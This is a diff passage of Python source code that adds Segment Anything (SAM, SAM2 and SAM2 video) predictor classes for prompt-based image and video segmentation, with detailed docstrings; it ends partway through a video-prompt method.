+ + Examples: + >>> predictor = Predictor() + >>> predictor.setup_model(model_path="sam_model.pt") + >>> predictor.set_image("image.jpg") + >>> masks, scores, logits = predictor.inference(im, bboxes=[[0, 0, 100, 100]]) + """ + # Override prompts if any stored in self.prompts + bboxes = self.prompts.pop("bboxes", bboxes) + points = self.prompts.pop("points", points) + masks = self.prompts.pop("masks", masks) + labels = self.prompts.pop("labels", labels) + + if all(i is None for i in [bboxes, points, masks]): + return self.generate(im, *args, **kwargs) + + return self.prompt_inference(im, bboxes, points, labels, masks, multimask_output) + + def prompt_inference(self, im, bboxes=None, points=None, labels=None, masks=None, multimask_output=False): + """ + Performs image segmentation inference based on input cues using SAM's specialized architecture. + + This internal function leverages the Segment Anything Model (SAM) for prompt-based, real-time segmentation. + It processes various input prompts such as bounding boxes, points, and masks to generate segmentation masks. + + Args: + im (torch.Tensor): Preprocessed input image tensor with shape (N, C, H, W). + bboxes (np.ndarray | List | None): Bounding boxes in XYXY format with shape (N, 4). + points (np.ndarray | List | None): Points indicating object locations with shape (N, 2) or (N, num_points, 2), in pixels. + labels (np.ndarray | List | None): Point prompt labels with shape (N,) or (N, num_points). 1 for foreground, 0 for background. + masks (np.ndarray | None): Low-res masks from previous predictions with shape (N, H, W). For SAM, H=W=256. + multimask_output (bool): Flag to return multiple masks for ambiguous prompts. + + Raises: + AssertionError: If the number of points don't match the number of labels, in case labels were passed. + + Returns: + (np.ndarray): Output masks with shape (C, H, W), where C is the number of generated masks. 
+ (np.ndarray): Quality scores predicted by the model for each mask, with length C. + + Examples: + >>> predictor = Predictor() + >>> im = torch.rand(1, 3, 1024, 1024) + >>> bboxes = [[100, 100, 200, 200]] + >>> masks, scores, logits = predictor.prompt_inference(im, bboxes=bboxes) + """ + features = self.get_im_features(im) if self.features is None else self.features + + bboxes, points, labels, masks = self._prepare_prompts(im.shape[2:], bboxes, points, labels, masks) + points = (points, labels) if points is not None else None + # Embed prompts + sparse_embeddings, dense_embeddings = self.model.prompt_encoder(points=points, boxes=bboxes, masks=masks) + + # Predict masks + pred_masks, pred_scores = self.model.mask_decoder( + image_embeddings=features, + image_pe=self.model.prompt_encoder.get_dense_pe(), + sparse_prompt_embeddings=sparse_embeddings, + dense_prompt_embeddings=dense_embeddings, + multimask_output=multimask_output, + ) + + # (N, d, H, W) --> (N*d, H, W), (N, d) --> (N*d, ) + # `d` could be 1 or 3 depends on `multimask_output`. + return pred_masks.flatten(0, 1), pred_scores.flatten(0, 1) + + def _prepare_prompts(self, dst_shape, bboxes=None, points=None, labels=None, masks=None): + """ + Prepares and transforms the input prompts for processing based on the destination shape. + + Args: + dst_shape (tuple): The target shape (height, width) for the prompts. + bboxes (np.ndarray | List | None): Bounding boxes in XYXY format with shape (N, 4). + points (np.ndarray | List | None): Points indicating object locations with shape (N, 2) or (N, num_points, 2), in pixels. + labels (np.ndarray | List | None): Point prompt labels with shape (N,) or (N, num_points). 1 for foreground, 0 for background. + masks (List | np.ndarray, Optional): Masks for the objects, where each mask is a 2D array. + + Raises: + AssertionError: If the number of points don't match the number of labels, in case labels were passed. 
+ + Returns: + (tuple): A tuple containing transformed bounding boxes, points, labels, and masks. + """ + src_shape = self.batch[1][0].shape[:2] + r = 1.0 if self.segment_all else min(dst_shape[0] / src_shape[0], dst_shape[1] / src_shape[1]) + # Transform input prompts + if points is not None: + points = torch.as_tensor(points, dtype=torch.float32, device=self.device) + points = points[None] if points.ndim == 1 else points + # Assuming labels are all positive if users don't pass labels. + if labels is None: + labels = np.ones(points.shape[:-1]) + labels = torch.as_tensor(labels, dtype=torch.int32, device=self.device) + assert ( + points.shape[-2] == labels.shape[-1] + ), f"Number of points {points.shape[-2]} should match number of labels {labels.shape[-1]}." + points *= r + if points.ndim == 2: + # (N, 2) --> (N, 1, 2), (N, ) --> (N, 1) + points, labels = points[:, None, :], labels[:, None] + if bboxes is not None: + bboxes = torch.as_tensor(bboxes, dtype=torch.float32, device=self.device) + bboxes = bboxes[None] if bboxes.ndim == 1 else bboxes + bboxes *= r + if masks is not None: + masks = torch.as_tensor(masks, dtype=torch.float32, device=self.device).unsqueeze(1) + return bboxes, points, labels, masks + + def generate( + self, + im, + crop_n_layers=0, + crop_overlap_ratio=512 / 1500, + crop_downscale_factor=1, + point_grids=None, + points_stride=32, + points_batch_size=64, + conf_thres=0.88, + stability_score_thresh=0.95, + stability_score_offset=0.95, + crop_nms_thresh=0.7, + ): + """ + Perform image segmentation using the Segment Anything Model (SAM). + + This method segments an entire image into constituent parts by leveraging SAM's advanced architecture + and real-time performance capabilities. It can optionally work on image crops for finer segmentation. + + Args: + im (torch.Tensor): Input tensor representing the preprocessed image with shape (N, C, H, W). + crop_n_layers (int): Number of layers for additional mask predictions on image crops. 
+ crop_overlap_ratio (float): Overlap between crops, scaled down in subsequent layers. + crop_downscale_factor (int): Scaling factor for sampled points-per-side in each layer. + point_grids (List[np.ndarray] | None): Custom grids for point sampling normalized to [0,1]. + points_stride (int): Number of points to sample along each side of the image. + points_batch_size (int): Batch size for the number of points processed simultaneously. + conf_thres (float): Confidence threshold [0,1] for filtering based on mask quality prediction. + stability_score_thresh (float): Stability threshold [0,1] for mask filtering based on stability. + stability_score_offset (float): Offset value for calculating stability score. + crop_nms_thresh (float): IoU cutoff for NMS to remove duplicate masks between crops. + + Returns: + pred_masks (torch.Tensor): Segmented masks with shape (N, H, W). + pred_scores (torch.Tensor): Confidence scores for each mask with shape (N,). + pred_bboxes (torch.Tensor): Bounding boxes for each mask with shape (N, 4). 
+ + Examples: + >>> predictor = Predictor() + >>> im = torch.rand(1, 3, 1024, 1024) # Example input image + >>> masks, scores, boxes = predictor.generate(im) + """ + import torchvision # scope for faster 'import ultralytics' + + self.segment_all = True + ih, iw = im.shape[2:] + crop_regions, layer_idxs = generate_crop_boxes((ih, iw), crop_n_layers, crop_overlap_ratio) + if point_grids is None: + point_grids = build_all_layer_point_grids(points_stride, crop_n_layers, crop_downscale_factor) + pred_masks, pred_scores, pred_bboxes, region_areas = [], [], [], [] + for crop_region, layer_idx in zip(crop_regions, layer_idxs): + x1, y1, x2, y2 = crop_region + w, h = x2 - x1, y2 - y1 + area = torch.tensor(w * h, device=im.device) + points_scale = np.array([[w, h]]) # w, h + # Crop image and interpolate to input size + crop_im = F.interpolate(im[..., y1:y2, x1:x2], (ih, iw), mode="bilinear", align_corners=False) + # (num_points, 2) + points_for_image = point_grids[layer_idx] * points_scale + crop_masks, crop_scores, crop_bboxes = [], [], [] + for (points,) in batch_iterator(points_batch_size, points_for_image): + pred_mask, pred_score = self.prompt_inference(crop_im, points=points, multimask_output=True) + # Interpolate predicted masks to input size + pred_mask = F.interpolate(pred_mask[None], (h, w), mode="bilinear", align_corners=False)[0] + idx = pred_score > conf_thres + pred_mask, pred_score = pred_mask[idx], pred_score[idx] + + stability_score = calculate_stability_score( + pred_mask, self.model.mask_threshold, stability_score_offset + ) + idx = stability_score > stability_score_thresh + pred_mask, pred_score = pred_mask[idx], pred_score[idx] + # Bool type is much more memory-efficient. 
+ pred_mask = pred_mask > self.model.mask_threshold + # (N, 4) + pred_bbox = batched_mask_to_box(pred_mask).float() + keep_mask = ~is_box_near_crop_edge(pred_bbox, crop_region, [0, 0, iw, ih]) + if not torch.all(keep_mask): + pred_bbox, pred_mask, pred_score = pred_bbox[keep_mask], pred_mask[keep_mask], pred_score[keep_mask] + + crop_masks.append(pred_mask) + crop_bboxes.append(pred_bbox) + crop_scores.append(pred_score) + + # Do nms within this crop + crop_masks = torch.cat(crop_masks) + crop_bboxes = torch.cat(crop_bboxes) + crop_scores = torch.cat(crop_scores) + keep = torchvision.ops.nms(crop_bboxes, crop_scores, self.args.iou) # NMS + crop_bboxes = uncrop_boxes_xyxy(crop_bboxes[keep], crop_region) + crop_masks = uncrop_masks(crop_masks[keep], crop_region, ih, iw) + crop_scores = crop_scores[keep] + + pred_masks.append(crop_masks) + pred_bboxes.append(crop_bboxes) + pred_scores.append(crop_scores) + region_areas.append(area.expand(len(crop_masks))) + + pred_masks = torch.cat(pred_masks) + pred_bboxes = torch.cat(pred_bboxes) + pred_scores = torch.cat(pred_scores) + region_areas = torch.cat(region_areas) + + # Remove duplicate masks between crops + if len(crop_regions) > 1: + scores = 1 / region_areas + keep = torchvision.ops.nms(pred_bboxes, scores, crop_nms_thresh) + pred_masks, pred_bboxes, pred_scores = pred_masks[keep], pred_bboxes[keep], pred_scores[keep] + + return pred_masks, pred_scores, pred_bboxes + + def setup_model(self, model=None, verbose=True): + """ + Initializes the Segment Anything Model (SAM) for inference. + + This method sets up the SAM model by allocating it to the appropriate device and initializing the necessary + parameters for image normalization and other Ultralytics compatibility settings. + + Args: + model (torch.nn.Module | None): A pretrained SAM model. If None, a new model is built based on config. + verbose (bool): If True, prints selected device information. 
+ + Examples: + >>> predictor = Predictor() + >>> predictor.setup_model(model=sam_model, verbose=True) + """ + device = select_device(self.args.device, verbose=verbose) + if model is None: + model = self.get_model() + model.eval() + self.model = model.to(device) + self.device = device + self.mean = torch.tensor([123.675, 116.28, 103.53]).view(-1, 1, 1).to(device) + self.std = torch.tensor([58.395, 57.12, 57.375]).view(-1, 1, 1).to(device) + + # Ultralytics compatibility settings + self.model.pt = False + self.model.triton = False + self.model.stride = 32 + self.model.fp16 = False + self.done_warmup = True + + def get_model(self): + """Retrieves or builds the Segment Anything Model (SAM) for image segmentation tasks.""" + return build_sam(self.args.model) + + def postprocess(self, preds, img, orig_imgs): + """ + Post-processes SAM's inference outputs to generate object detection masks and bounding boxes. + + This method scales masks and boxes to the original image size and applies a threshold to the mask + predictions. It leverages SAM's advanced architecture for real-time, promptable segmentation tasks. + + Args: + preds (Tuple[torch.Tensor]): The output from SAM model inference, containing: + - pred_masks (torch.Tensor): Predicted masks with shape (N, 1, H, W). + - pred_scores (torch.Tensor): Confidence scores for each mask with shape (N, 1). + - pred_bboxes (torch.Tensor, optional): Predicted bounding boxes if segment_all is True. + img (torch.Tensor): The processed input image tensor with shape (C, H, W). + orig_imgs (List[np.ndarray] | torch.Tensor): The original, unprocessed images. + + Returns: + results (List[Results]): List of Results objects containing detection masks, bounding boxes, and other + metadata for each processed image. 
+ + Examples: + >>> predictor = Predictor() + >>> preds = predictor.inference(img) + >>> results = predictor.postprocess(preds, img, orig_imgs) + """ + # (N, 1, H, W), (N, 1) + pred_masks, pred_scores = preds[:2] + pred_bboxes = preds[2] if self.segment_all else None + names = dict(enumerate(str(i) for i in range(len(pred_masks)))) + + if not isinstance(orig_imgs, list): # input images are a torch.Tensor, not a list + orig_imgs = ops.convert_torch2numpy_batch(orig_imgs) + + results = [] + for masks, orig_img, img_path in zip([pred_masks], orig_imgs, self.batch[0]): + if len(masks) == 0: + masks, pred_bboxes = None, torch.zeros((0, 6), device=pred_masks.device) + else: + masks = ops.scale_masks(masks[None].float(), orig_img.shape[:2], padding=False)[0] + masks = masks > self.model.mask_threshold # to bool + if pred_bboxes is not None: + pred_bboxes = ops.scale_boxes(img.shape[2:], pred_bboxes.float(), orig_img.shape, padding=False) + else: + pred_bboxes = batched_mask_to_box(masks) + # NOTE: SAM models do not return cls info. This `cls` here is just a placeholder for consistency. + cls = torch.arange(len(pred_masks), dtype=torch.int32, device=pred_masks.device) + pred_bboxes = torch.cat([pred_bboxes, pred_scores[:, None], cls[:, None]], dim=-1) + results.append(Results(orig_img, path=img_path, names=names, masks=masks, boxes=pred_bboxes)) + # Reset segment-all mode. + self.segment_all = False + return results + + def setup_source(self, source): + """ + Sets up the data source for inference. + + This method configures the data source from which images will be fetched for inference. It supports + various input types such as image files, directories, video files, and other compatible data sources. + + Args: + source (str | Path | None): The path or identifier for the image data source. Can be a file path, + directory path, URL, or other supported source types. 
+ + Examples: + >>> predictor = Predictor() + >>> predictor.setup_source("path/to/images") + >>> predictor.setup_source("video.mp4") + >>> predictor.setup_source(None) # Uses default source if available + + Notes: + - If source is None, the method may use a default source if configured. + - The method adapts to different source types and prepares them for subsequent inference steps. + - Supported source types may include local files, directories, URLs, and video streams. + """ + if source is not None: + super().setup_source(source) + + def set_image(self, image): + """ + Preprocesses and sets a single image for inference. + + This method prepares the model for inference on a single image by setting up the model if not already + initialized, configuring the data source, and preprocessing the image for feature extraction. It + ensures that only one image is set at a time and extracts image features for subsequent use. + + Args: + image (str | np.ndarray): Path to the image file as a string, or a numpy array representing + an image read by cv2. + + Raises: + AssertionError: If more than one image is attempted to be set. + + Examples: + >>> predictor = Predictor() + >>> predictor.set_image("path/to/image.jpg") + >>> predictor.set_image(cv2.imread("path/to/image.jpg")) + + Notes: + - This method should be called before performing inference on a new image. + - The extracted features are stored in the `self.features` attribute for later use. + """ + if self.model is None: + self.setup_model(model=None) + self.setup_source(image) + assert len(self.dataset) == 1, "`set_image` only supports setting one image!" 
+ for batch in self.dataset: + im = self.preprocess(batch[1]) + self.features = self.get_im_features(im) + break + + def get_im_features(self, im): + """Extracts image features using the SAM model's image encoder for subsequent mask prediction.""" + assert ( + isinstance(self.imgsz, (tuple, list)) and self.imgsz[0] == self.imgsz[1] + ), f"SAM models only support square image size, but got {self.imgsz}." + self.model.set_imgsz(self.imgsz) + return self.model.image_encoder(im) + + def set_prompts(self, prompts): + """Sets prompts for subsequent inference operations.""" + self.prompts = prompts + + def reset_image(self): + """Resets the current image and its features, clearing them for subsequent inference.""" + self.im = None + self.features = None + + @staticmethod + def remove_small_regions(masks, min_area=0, nms_thresh=0.7): + """ + Remove small disconnected regions and holes from segmentation masks. + + This function performs post-processing on segmentation masks generated by the Segment Anything Model (SAM). + It removes small disconnected regions and holes from the input masks, and then performs Non-Maximum + Suppression (NMS) to eliminate any newly created duplicate boxes. + + Args: + masks (torch.Tensor): Segmentation masks to be processed, with shape (N, H, W) where N is the number of + masks, H is height, and W is width. + min_area (int): Minimum area threshold for removing disconnected regions and holes. Regions smaller than + this will be removed. + nms_thresh (float): IoU threshold for the NMS algorithm to remove duplicate boxes. + + Returns: + new_masks (torch.Tensor): Processed masks with small regions removed, shape (N, H, W). + keep (List[int]): Indices of remaining masks after NMS, for filtering corresponding boxes. 
+ + Examples: + >>> masks = torch.rand(5, 640, 640) > 0.5 # 5 random binary masks + >>> new_masks, keep = remove_small_regions(masks, min_area=100, nms_thresh=0.7) + >>> print(f"Original masks: {masks.shape}, Processed masks: {new_masks.shape}") + >>> print(f"Indices of kept masks: {keep}") + """ + import torchvision # scope for faster 'import ultralytics' + + if len(masks) == 0: + return masks + + # Filter small disconnected regions and holes + new_masks = [] + scores = [] + for mask in masks: + mask = mask.cpu().numpy().astype(np.uint8) + mask, changed = remove_small_regions(mask, min_area, mode="holes") + unchanged = not changed + mask, changed = remove_small_regions(mask, min_area, mode="islands") + unchanged = unchanged and not changed + + new_masks.append(torch.as_tensor(mask).unsqueeze(0)) + # Give score=0 to changed masks and 1 to unchanged masks so NMS prefers masks not needing postprocessing + scores.append(float(unchanged)) + + # Recalculate boxes and remove any new duplicates + new_masks = torch.cat(new_masks, dim=0) + boxes = batched_mask_to_box(new_masks) + keep = torchvision.ops.nms(boxes.float(), torch.as_tensor(scores), nms_thresh) + + return new_masks[keep].to(device=masks.device, dtype=masks.dtype), keep + + +class SAM2Predictor(Predictor): + """ + SAM2Predictor class for advanced image segmentation using Segment Anything Model 2 architecture. + + This class extends the base Predictor class to implement SAM2-specific functionality for image + segmentation tasks. It provides methods for model initialization, feature extraction, and + prompt-based inference. + + Attributes: + _bb_feat_sizes (List[Tuple[int, int]]): Feature sizes for different backbone levels. + model (torch.nn.Module): The loaded SAM2 model. + device (torch.device): The device (CPU or GPU) on which the model is loaded. + features (Dict[str, torch.Tensor]): Cached image features for efficient inference. + segment_all (bool): Flag to indicate if all segments should be predicted. 
+ prompts (Dict): Dictionary to store various types of prompts for inference. + + Methods: + get_model: Retrieves and initializes the SAM2 model. + prompt_inference: Performs image segmentation inference based on various prompts. + set_image: Preprocesses and sets a single image for inference. + get_im_features: Extracts and processes image features using SAM2's image encoder. + + Examples: + >>> predictor = SAM2Predictor(cfg) + >>> predictor.set_image("path/to/image.jpg") + >>> bboxes = [[100, 100, 200, 200]] + >>> masks, scores, _ = predictor.prompt_inference(predictor.im, bboxes=bboxes) + >>> print(f"Predicted {len(masks)} masks with average score {scores.mean():.2f}") + """ + + _bb_feat_sizes = [ + (256, 256), + (128, 128), + (64, 64), + ] + + def get_model(self): + """Retrieves and initializes the Segment Anything Model 2 (SAM2) for image segmentation tasks.""" + return build_sam(self.args.model) + + def prompt_inference( + self, + im, + bboxes=None, + points=None, + labels=None, + masks=None, + multimask_output=False, + img_idx=-1, + ): + """ + Performs image segmentation inference based on various prompts using SAM2 architecture. + + This method leverages the Segment Anything Model 2 (SAM2) to generate segmentation masks for input images + based on provided prompts such as bounding boxes, points, or existing masks. It supports both single and + multi-object prediction scenarios. + + Args: + im (torch.Tensor): Preprocessed input image tensor with shape (N, C, H, W). + bboxes (np.ndarray | List[List[float]] | None): Bounding boxes in XYXY format with shape (N, 4). + points (np.ndarray | List[List[float]] | None): Object location points with shape (N, 2), in pixels. + labels (np.ndarray | List[int] | None): Point prompt labels with shape (N,). 1 = foreground, 0 = background. + masks (np.ndarray | None): Low-resolution masks from previous predictions with shape (N, H, W). + multimask_output (bool): Flag to return multiple masks for ambiguous prompts. 
+ img_idx (int): Index of the image in the batch to process. + + Returns: + (np.ndarray): Output masks with shape (C, H, W), where C is the number of generated masks. + (np.ndarray): Quality scores for each mask, with length C. + + Examples: + >>> predictor = SAM2Predictor(cfg) + >>> image = torch.rand(1, 3, 640, 640) + >>> bboxes = [[100, 100, 200, 200]] + >>> masks, scores, logits = predictor.prompt_inference(image, bboxes=bboxes) + >>> print(f"Generated {masks.shape[0]} masks with average score {scores.mean():.2f}") + + Notes: + - The method supports batched inference for multiple objects when points or bboxes are provided. + - Input prompts (bboxes, points) are automatically scaled to match the input image dimensions. + - When both bboxes and points are provided, they are merged into a single 'points' input for the model. + + References: + - SAM2 Paper: [Add link to SAM2 paper when available] + """ + features = self.get_im_features(im) if self.features is None else self.features + + points, labels, masks = self._prepare_prompts(im.shape[2:], bboxes, points, labels, masks) + points = (points, labels) if points is not None else None + + sparse_embeddings, dense_embeddings = self.model.sam_prompt_encoder( + points=points, + boxes=None, + masks=masks, + ) + # Predict masks + batched_mode = points is not None and points[0].shape[0] > 1 # multi object prediction + high_res_features = [feat_level[img_idx].unsqueeze(0) for feat_level in features["high_res_feats"]] + pred_masks, pred_scores, _, _ = self.model.sam_mask_decoder( + image_embeddings=features["image_embed"][img_idx].unsqueeze(0), + image_pe=self.model.sam_prompt_encoder.get_dense_pe(), + sparse_prompt_embeddings=sparse_embeddings, + dense_prompt_embeddings=dense_embeddings, + multimask_output=multimask_output, + repeat_image=batched_mode, + high_res_features=high_res_features, + ) + # (N, d, H, W) --> (N*d, H, W), (N, d) --> (N*d, ) + # `d` could be 1 or 3 depends on `multimask_output`. 
+ return pred_masks.flatten(0, 1), pred_scores.flatten(0, 1) + + def _prepare_prompts(self, dst_shape, bboxes=None, points=None, labels=None, masks=None): + """ + Prepares and transforms the input prompts for processing based on the destination shape. + + Args: + dst_shape (tuple): The target shape (height, width) for the prompts. + bboxes (np.ndarray | List | None): Bounding boxes in XYXY format with shape (N, 4). + points (np.ndarray | List | None): Points indicating object locations with shape (N, 2) or (N, num_points, 2), in pixels. + labels (np.ndarray | List | None): Point prompt labels with shape (N,) or (N, num_points). 1 for foreground, 0 for background. + masks (List | np.ndarray, Optional): Masks for the objects, where each mask is a 2D array. + + Raises: + AssertionError: If the number of points don't match the number of labels, in case labels were passed. + + Returns: + (tuple): A tuple containing transformed points, labels, and masks. + """ + bboxes, points, labels, masks = super()._prepare_prompts(dst_shape, bboxes, points, labels, masks) + if bboxes is not None: + bboxes = bboxes.view(-1, 2, 2) + bbox_labels = torch.tensor([[2, 3]], dtype=torch.int32, device=bboxes.device).expand(len(bboxes), -1) + # NOTE: merge "boxes" and "points" into a single "points" input + # (where boxes are added at the beginning) to model.sam_prompt_encoder + if points is not None: + points = torch.cat([bboxes, points], dim=1) + labels = torch.cat([bbox_labels, labels], dim=1) + else: + points, labels = bboxes, bbox_labels + return points, labels, masks + + def set_image(self, image): + """ + Preprocesses and sets a single image for inference using the SAM2 model. + + This method initializes the model if not already done, configures the data source to the specified image, + and preprocesses the image for feature extraction. It supports setting only one image at a time. 
+ + Args: + image (str | np.ndarray): Path to the image file as a string, or a numpy array representing the image. + + Raises: + AssertionError: If more than one image is attempted to be set. + + Examples: + >>> predictor = SAM2Predictor() + >>> predictor.set_image("path/to/image.jpg") + >>> predictor.set_image(np.array([...])) # Using a numpy array + + Notes: + - This method must be called before performing any inference on a new image. + - The method caches the extracted features for efficient subsequent inferences on the same image. + - Only one image can be set at a time. To process multiple images, call this method for each new image. + """ + if self.model is None: + self.setup_model(model=None) + self.setup_source(image) + assert len(self.dataset) == 1, "`set_image` only supports setting one image!" + for batch in self.dataset: + im = self.preprocess(batch[1]) + self.features = self.get_im_features(im) + break + + def get_im_features(self, im): + """Extracts image features from the SAM image encoder for subsequent processing.""" + assert ( + isinstance(self.imgsz, (tuple, list)) and self.imgsz[0] == self.imgsz[1] + ), f"SAM 2 models only support square image size, but got {self.imgsz}." + self.model.set_imgsz(self.imgsz) + self._bb_feat_sizes = [[x // (4 * i) for x in self.imgsz] for i in [1, 2, 4]] + + backbone_out = self.model.forward_image(im) + _, vision_feats, _, _ = self.model._prepare_backbone_features(backbone_out) + if self.model.directly_add_no_mem_embed: + vision_feats[-1] = vision_feats[-1] + self.model.no_mem_embed + feats = [ + feat.permute(1, 2, 0).view(1, -1, *feat_size) + for feat, feat_size in zip(vision_feats[::-1], self._bb_feat_sizes[::-1]) + ][::-1] + return {"image_embed": feats[-1], "high_res_feats": feats[:-1]} + + +class SAM2VideoPredictor(SAM2Predictor): + """ + SAM2VideoPredictor to handle user interactions with videos and manage inference states. 
+ + This class extends the functionality of SAM2Predictor to support video processing and maintains + the state of inference operations. It includes configurations for managing non-overlapping masks, + clearing memory for non-conditional inputs, and setting up callbacks for prediction events. + + Attributes: + inference_state (Dict): A dictionary to store the current state of inference operations. + non_overlap_masks (bool): A flag indicating whether masks should be non-overlapping. + clear_non_cond_mem_around_input (bool): A flag to control clearing non-conditional memory around inputs. + clear_non_cond_mem_for_multi_obj (bool): A flag to control clearing non-conditional memory for multi-object scenarios. + callbacks (Dict): A dictionary of callbacks for various prediction lifecycle events. + + Args: + cfg (Dict, Optional): Configuration settings for the predictor. Defaults to DEFAULT_CFG. + overrides (Dict, Optional): Additional configuration overrides. Defaults to None. + _callbacks (Dict, Optional): Custom callbacks to be added. Defaults to None. + + Note: + The `fill_hole_area` attribute is commented out and not used in the current implementation. + """ + + # fill_hole_area = 8 # not used + + def __init__(self, cfg=DEFAULT_CFG, overrides=None, _callbacks=None): + """ + Initialize the predictor with configuration and optional overrides. + + This constructor initializes the SAM2VideoPredictor with a given configuration, applies any + specified overrides, and sets up the inference state along with certain flags + that control the behavior of the predictor. + + Args: + cfg (Dict): Configuration dictionary containing default settings. + overrides (Dict | None): Dictionary of values to override default configuration. + _callbacks (Dict | None): Dictionary of callback functions to customize behavior.
+ + Examples: + >>> predictor = SAM2VideoPredictor(cfg=DEFAULT_CFG) + >>> predictor = SAM2VideoPredictor(overrides={"imgsz": 640}) + >>> predictor = SAM2VideoPredictor(_callbacks={"on_predict_start": custom_callback}) + """ + super().__init__(cfg, overrides, _callbacks) + self.inference_state = {} + self.non_overlap_masks = True + self.clear_non_cond_mem_around_input = False + self.clear_non_cond_mem_for_multi_obj = False + self.callbacks["on_predict_start"].append(self.init_state) + + def get_model(self): + """ + Retrieves and configures the model with binarization enabled. + + Note: + This method overrides the base class implementation to set the binarize flag to True. + """ + model = super().get_model() + model.set_binarize(True) + return model + + def inference(self, im, bboxes=None, points=None, labels=None, masks=None): + """ + Perform image segmentation inference based on the given input cues, using the currently loaded image. This + method leverages SAM's (Segment Anything Model) architecture consisting of image encoder, prompt encoder, and + mask decoder for real-time and promptable segmentation tasks. + + Args: + im (torch.Tensor): The preprocessed input image in tensor format, with shape (N, C, H, W). + bboxes (np.ndarray | List, optional): Bounding boxes with shape (N, 4), in XYXY format. + points (np.ndarray | List, optional): Points indicating object locations with shape (N, 2), in pixels. + labels (np.ndarray | List, optional): Labels for point prompts, shape (N, ). 1 = foreground, 0 = background. + masks (np.ndarray, optional): Low-resolution masks from previous predictions shape (N,H,W). For SAM H=W=256. + + Returns: + (torch.Tensor): The output masks for the current frame with shape (C, H, W), where C is the number of non-blank masks kept. + (torch.Tensor): A tensor of ones with length C, used as placeholder scores for the returned masks.
+ """ + # Override prompts if any stored in self.prompts + bboxes = self.prompts.pop("bboxes", bboxes) + points = self.prompts.pop("points", points) + masks = self.prompts.pop("masks", masks) + + frame = self.dataset.frame + self.inference_state["im"] = im + output_dict = self.inference_state["output_dict"] + if len(output_dict["cond_frame_outputs"]) == 0: # initialize prompts + points, labels, masks = self._prepare_prompts(im.shape[2:], bboxes, points, labels, masks) + if points is not None: + for i in range(len(points)): + self.add_new_prompts(obj_id=i, points=points[[i]], labels=labels[[i]], frame_idx=frame) + elif masks is not None: + for i in range(len(masks)): + self.add_new_prompts(obj_id=i, masks=masks[[i]], frame_idx=frame) + self.propagate_in_video_preflight() + + consolidated_frame_inds = self.inference_state["consolidated_frame_inds"] + batch_size = len(self.inference_state["obj_idx_to_id"]) + if len(output_dict["cond_frame_outputs"]) == 0: + raise RuntimeError("No points are provided; please add points first") + + if frame in consolidated_frame_inds["cond_frame_outputs"]: + storage_key = "cond_frame_outputs" + current_out = output_dict[storage_key][frame] + if self.clear_non_cond_mem_around_input and (self.clear_non_cond_mem_for_multi_obj or batch_size <= 1): + # clear non-conditioning memory of the surrounding frames + self._clear_non_cond_mem_around_input(frame) + elif frame in consolidated_frame_inds["non_cond_frame_outputs"]: + storage_key = "non_cond_frame_outputs" + current_out = output_dict[storage_key][frame] + else: + storage_key = "non_cond_frame_outputs" + current_out = self._run_single_frame_inference( + output_dict=output_dict, + frame_idx=frame, + batch_size=batch_size, + is_init_cond_frame=False, + point_inputs=None, + mask_inputs=None, + reverse=False, + run_mem_encoder=True, + ) + output_dict[storage_key][frame] = current_out + # Create slices of per-object outputs for subsequent interaction with each + # individual object after 
tracking. + self._add_output_per_object(frame, current_out, storage_key) + self.inference_state["frames_already_tracked"].append(frame) + pred_masks = current_out["pred_masks"].flatten(0, 1) + pred_masks = pred_masks[(pred_masks > self.model.mask_threshold).sum((1, 2)) > 0] # filter blank masks + + return pred_masks, torch.ones(len(pred_masks), dtype=pred_masks.dtype, device=pred_masks.device) + + def postprocess(self, preds, img, orig_imgs): + """ + Post-processes the predictions to apply non-overlapping constraints if required. + + This method extends the post-processing functionality by applying non-overlapping constraints + to the predicted masks if the `non_overlap_masks` flag is set to True. This ensures that + the masks do not overlap, which can be useful for certain applications. + + Args: + preds (Tuple[torch.Tensor]): The predictions from the model. + img (torch.Tensor): The processed image tensor. + orig_imgs (List[np.ndarray]): The original images before processing. + + Returns: + results (list): The post-processed predictions. + + Note: + If `non_overlap_masks` is True, the method applies constraints to ensure non-overlapping masks. + """ + results = super().postprocess(preds, img, orig_imgs) + if self.non_overlap_masks: + for result in results: + if result.masks is None or len(result.masks) == 0: + continue + result.masks.data = self.model._apply_non_overlapping_constraints(result.masks.data.unsqueeze(0))[0] + return results + + @smart_inference_mode() + def add_new_prompts( + self, + obj_id, + points=None, + labels=None, + masks=None, + frame_idx=0, + ): + """ + Adds new points or masks to a specific frame for a given object ID. + + This method updates the inference state with new prompts (points or masks) for a specified + object and frame index. It ensures that the prompts are either points or masks, but not both, + and updates the internal state accordingly. 
It also handles the generation of new segmentations + based on the provided prompts and the existing state. + + Args: + obj_id (int): The ID of the object to which the prompts are associated. + points (torch.Tensor, Optional): The coordinates of the points of interest. Defaults to None. + labels (torch.Tensor, Optional): The labels corresponding to the points. Defaults to None. + masks (torch.Tensor, optional): Binary masks for the object. Defaults to None. + frame_idx (int, optional): The index of the frame to which the prompts are applied. Defaults to 0. + + Returns: + (tuple): A tuple containing the flattened predicted masks and a tensor of ones indicating the number of objects. + + Raises: + AssertionError: If both `masks` and `points` are provided, or neither is provided. + + Note: + - Only one type of prompt (either points or masks) can be added per call. + - If the frame is being tracked for the first time, it is treated as an initial conditioning frame. + - The method handles the consolidation of outputs and resizing of masks to the original video resolution. + """ + assert (masks is None) ^ (points is None), "'masks' and 'points' prompts are not compatible with each other." + obj_idx = self._obj_id_to_idx(obj_id) + + point_inputs = None + pop_key = "point_inputs_per_obj" + if points is not None: + point_inputs = {"point_coords": points, "point_labels": labels} + self.inference_state["point_inputs_per_obj"][obj_idx][frame_idx] = point_inputs + pop_key = "mask_inputs_per_obj" + self.inference_state["mask_inputs_per_obj"][obj_idx][frame_idx] = masks + self.inference_state[pop_key][obj_idx].pop(frame_idx, None) + # If this frame hasn't been tracked before, we treat it as an initial conditioning + # frame, meaning that the inputs points are to generate segments on this frame without + # using any memory from other frames, like in SAM. Otherwise (if it has been tracked), + # the input points will be used to correct the already tracked masks. 
